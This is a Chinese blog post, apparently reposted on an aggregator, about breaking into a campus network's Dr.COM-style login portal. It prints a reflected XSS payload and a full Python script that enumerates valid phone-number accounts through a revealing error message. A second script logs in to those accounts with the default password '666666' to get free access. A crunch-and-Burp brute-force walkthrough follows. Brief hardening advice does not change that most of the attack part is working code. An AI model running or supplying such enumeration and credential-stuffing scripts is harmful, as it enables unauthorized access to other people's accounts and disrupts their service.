如何破校园网

这篇具有很好参考价值的文章主要介绍了如何破校园网。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

 下面会介绍两种破解方法

下面介绍的方法是用于账号和密码知道二者其一才行,如果二者都不知道,那就你费些时间了,这我就不多说了,懂得都懂..................

我先说一下破解思路:

其实很简单,无非就是跑字典,我们第一步就是要先生成字典,第二步去进行测试,就是类似于正常人登录一样,只不过我这是用脚本跑的,更快。

目录

利用python脚本破解

利用kali中的burp进行破解


利用python脚本破解

简介

前端做的不是很好,前端UI布局写的较差,后端接口也不太严谨,能够透露出些信息容易被利用,在找漏洞的过程中发现一个反射型的xss,用处不是很大毕竟要受害者点击才能执行恶意代码,我找到的这些东西和思路都总结在下面。

反射型XSS

如何破校园网,安全


http://10.100.10.100:801/eportal/portal/mac/unbind?callback=<script>alert("xss");</script>

一个危害不大的反射型XSS,下面就是文章的主题,如何蹭网!

认证网址

http://10.100.10.100  // 用户认证
http://10.100.10.3:8080/Self/login  // 用户后台登录
http://10.100.10.100:9002  //注销登录
http://10.100.10.100:801  // 主后台管理

分析认证

如何破校园网,安全

蹭网原理

蹭网的方法有很多,比较流行的是基于端口(可以自行百度),还有就是通过改主机MAC地址(已经上线了的主机MAC,把自己MAC的改成他的,那么两个能够同时上网,在这里会有一点小瑕疵,流量一下你这一下他那,总的来说是可以上网的)。

如何破校园网,安全

可以发现我随便输入一个不存在的账号加一个错误的密码,登录返回的信息居然是账号不存在?
不得了,通过上面的信息完全就可以跑手机号,一想到联通手机号开头是 130、131、132、155、156、185、186、145、176。

后面的数可以进行程序进行猜,一般来说安全意识不强的人不会拿到账号去更改密码的。
所以容易留下弱口令,校园网给的密码是6个6 或 1~6 只要拿到账号那岂不是就能登上去了?废话不多说开始写代码。。。

import requests
import re
import itertools
import multiprocessing
import os


url = "http://10.100.10.100/drcom/login"     

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36'
}


def checkUserId(userId):
    params = {
        "callback": "dr1003",
        "DDDDD": f"{userId}@unicom",
        "upass": "1",
        "0MKKey": "000",
        "R1": "0",
        "R2": "",
        "R3": "0",
        "R6": "0",
        "para": "00",
        "v6ip": "",
        "terminal_type": "1",
        "lang": "zh-cn",
        "jsVersion": "4.2",
        "v": "6687",
        "lang": "zh"
    }
    try:
        res = requests.get(url, params=params, headers=headers).text
        data = re.findall(r'"msga":"(.*?)"', res)
        if data[0] != "userid error1":
            with open(fr"{os.getcwd()}\userId.txt", "a") as f:
                f.writelines(userId + "\n")
            print(userId, "√")
        else:
            print(userId, "x")
    except Exception as e:
        print(f"Error for user ID {userId}: {e}")
        return e


if __name__ == '__main__':
    results = []
    prefix_list = ["1767399"]  # Create numbers list        #“1767399” 可以随便改
    num_processes = 2  # Create 2 multiprocesses

    pool = multiprocessing.Pool(num_processes)
    for suffix in itertools.product(range(0, 10), repeat=4):
        suffix_str = ''.join(map(str, suffix))
        for prefix in prefix_list:
            user_id = f"{prefix}{suffix_str}"
            result = pool.apply_async(checkUserId, args=(user_id,))
            results.append(result)

    # Wait for all processes to finish
    pool.close()
    pool.join()

    # Print any exceptions that occurred during execution
    for result in results:
        if result.get() is not None:
            print(result.get())

代码运行

这里我只写了Python3的脚本,就不用其他语言了,做这种事还是Python用的方便些。

如何破校园网,安全

运行结果

如何破校园网,安全

我运行一半就不跑了毕竟不是来搞破坏的,先看看保存的手机号有610多个手机号,效果还可以。

如何破校园网,安全

随便拿个账号试试 密码6个6 和我想得一样 登录成功!!

如何破校园网,安全

其他的账号都是一样,可以发现他现,在上网就不打扰他了。

安全总结

1.前端的错误提示不要给的太明显,可以写成这样 "账号或者密码错误"。
2.对账号密码的加密,虽然可以通过JS逆向出来但也可以增加安全性。
3.对前端错误次数做限制再加上验证码,虽然可以破解但也可以增加安全性。
4.当你拿到账号时登录后请先修改强密码,防止弱口令登录。

危害总结

1.登录后别人可以使用您的网络 可以等你下线再使用或者直接使用你的账号上网。
2.可以对你进行断网操作,危害校园网较大影响网络体验导致投诉。
3.可以修改你的密码,由于后台更改密码需要身份证,但并没有完善。
4.账号并没有绑定身份证,导致只能去办理校园网那里更改较麻烦。

修改密码

可以发现如果密码被改了,自己是无法从外面修改自己的密码的只能去办理校园网那里进行修改。

如何破校园网,安全

修改密码

修改无效

如何破校园网,安全

Wifi共享思路

既然都有账号密码,那我岂不是可以免费上网了,由于最后一个学期了就没办校园卡,
于是写了个遍历判断如果在上网的用户就不打扰了,只连不在上网的用户这样就好了。

import requests
import re

url = "http://10.100.10.100/drcom/login"

with open("userId.txt", "r") as f:
    for line in f.readlines():
        user_id = line.strip()
        params = {
            "callback": "dr1003",
            "DDDDD": f"{user_id}@unicom",
            "upass": "666666",
            "0MKKey": "123456",
            "R1": "0",
            "R2": "",
            "R3": "0",
            "R6": "0",
            "para": "00",
            "v6ip": "",
            "terminal_type": "1",
            "lang": "zh-cn",
            "jsVersion": "4.2",
            "v": "6687",
            "lang": "zh"
        }
        res = requests.get(url, params=params)
        cont = re.findall(r'{"result":(.*?),', res.text)
        print(cont)
        if cont and cont[0] == "1":
            print(f"{user_id}, 登录成功~")
            break

这样就可以破解校园网了,下面介绍另一种方法。

利用kali中的burp进行破解

kali想必大家都知道吧,里面的工具burp我就不跟大家过多叙述了,下面直接进入主题(我这里是知道密码,不知账号得情况,如果你们的是知道账号,不知密码也可以用以下方法)

首先我们先生成字典

如何破校园网,安全

这里的crunch是kali上的一个工具,-t表示%是数字,前面两个11分别表示的是生成的数字最短是11位,最长也是11位,>>是将生成的字典保存在tjy.txt中。

生成字典的方法还有很多,当平台不让发,所以你们去网上找找啦

然后我们对校园网站进行抓包,如下

如何破校园网,安全

 如何破校园网,安全

 如何破校园网,安全

 开始破解了

看响应码和长度,有不同的话进去看响应包

以上就是klai利用burp破解的过程

希望大家喜欢!!!文章来源地址https://www.toymoban.com/news/detail-675293.html

到了这里,关于如何破校园网的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 思科模拟简单校园网

    宿舍vlan10,教学楼vlan20,宿舍网为1.1.1.0/24网段,教学楼网段为2.2.2.0/24网段 1.DHCP服务器配置 桌面–IP配置–配置相关vlan网段的网关,子网掩码 DHCP(宿舍) 2.宿舍交换机配置 fa0/2 vlan 10 fa0/1 trunk 同理配置两个教室交换机sw1、sw2,配置vlan 20 3.交换机sw0配置 分别给DHCP(宿舍)、

    2024年02月10日
    浏览(53)
  • 在家访问校园网内网,异地用校园网上知网

    具体思路,使用tailscale连接校园网安装了代理服务的服务器(这里以centos7.6为服务端),windows10为客户端(家里的电脑),用tailscale连接两个设备,内网穿透。记住两个设备的ip,然后再用windows连centos的代理,我一般用ssr,ssr的服务端搭建发不出来,就不说了(我后期考虑在

    2024年02月07日
    浏览(47)
  • 使用eNSP搭建校园网

    哈喽,今天写一篇文章记录一下课上进行的实验 说实话,上早八这个脑子他是真的不带转的,家人们有没有什么好方法,能在早八的时候把脑子转起来😢 好了,讲一下实验背景。 学校有东西两个校区,东校区三个学院,用户共1000人,西校区一个学院,用户只有200人。 首先

    2024年02月07日
    浏览(53)
  • 校园网ensp模拟搭建

    文章目录 前言 目录 一、校园网拓扑图 二、地址规划  三、配置命令 1、二层配置 2、三层配置  3、AC配置重头戏来啦 配置设备的国家码 查看AP的MAC地址 方法一 方法二  配置AP鉴别模式  创建安全模板 创建SSID模板 创建VAP模板 为射频引用VAP模板 总结 学校最近在安装校园网,

    2023年04月09日
    浏览(46)
  • 实现校园网开机自启动部署

    ❤️ 博客主页 :  iknow181 🔥 系列专栏 :  Python 、 JavaSE 、 JavaWeb 、 CCNP 🎉 欢迎大家点赞👍收藏⭐评论✍ 目录 一.准备工作 1、IDE安装 2、安装Selenium 1.介绍 2.下载 3、安装pywifi 1.介绍 2.下载 4、下载浏览器驱动 二、登录校园网 1、打开浏览器 2、在网页中输入信息 3、对网页

    2024年02月04日
    浏览(40)
  • 校园网路由器连接教程

    本文提供了详细的步骤说明,教您如何通过路由器连接校园网,包括网络设置、IP配置、MAC地址克隆等关键操作。

    2024年02月09日
    浏览(43)
  • 思科校园网络设计,cisco校园网设计,适合毕设,期末作业

    私信或者评论作者留下联系方式获取完整实验拓扑和报告 私信或者评论留下微信我加你 领取验证文档+实验拓扑 本实验为个人资源禁止转载 作者:不想当网工 注:未经允许禁止转发任何内容 **注:该文章时校园网综合实验适合毕设,期末作业,完整版可联系作者领取,top

    2024年02月05日
    浏览(48)
  • 校园网免认证利用IPV6轻松绕过校园WiFi网关

    校园网绕过一题目老生常谈了,一逼带过,为什么要干这个事情你比我懂,不就是为了安全上网吗?哈哈哈哈,在大型局域网络下上网安全堪忧,所以必须加套。 以往我们绕过校园网通常利用UDP53端口或者UDP67,UDP68这样的必开端口,不过随着校园网的技术不断完善,这些端口

    2024年02月11日
    浏览(131)
  • 校园网免认证服务器大增加

    这学期搞拐了,服务器整多了,结果没有几个人来消耗带宽,监控图片为证,网速快,线路多 线路展示

    2024年02月09日
    浏览(29)
  • 【教程】路由器自动定时登录校园网

    转载请注明出处:小锋学长生活大爆炸[xfxuezhang.cn] 目录 前景提要 Python脚本 Shell脚本(推荐) 路由器挂机 实现效果 小米路由R4A千兆版安装breed+OpenWRT教程以及救砖(全脚本无需硬改) 【教程】保姆级红米AX6000刷UBoot和OpenWrt固件 详解OpenWrt路由器设置Crontab定时检查网络并重启 现

    2024年02月07日
    浏览(38)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包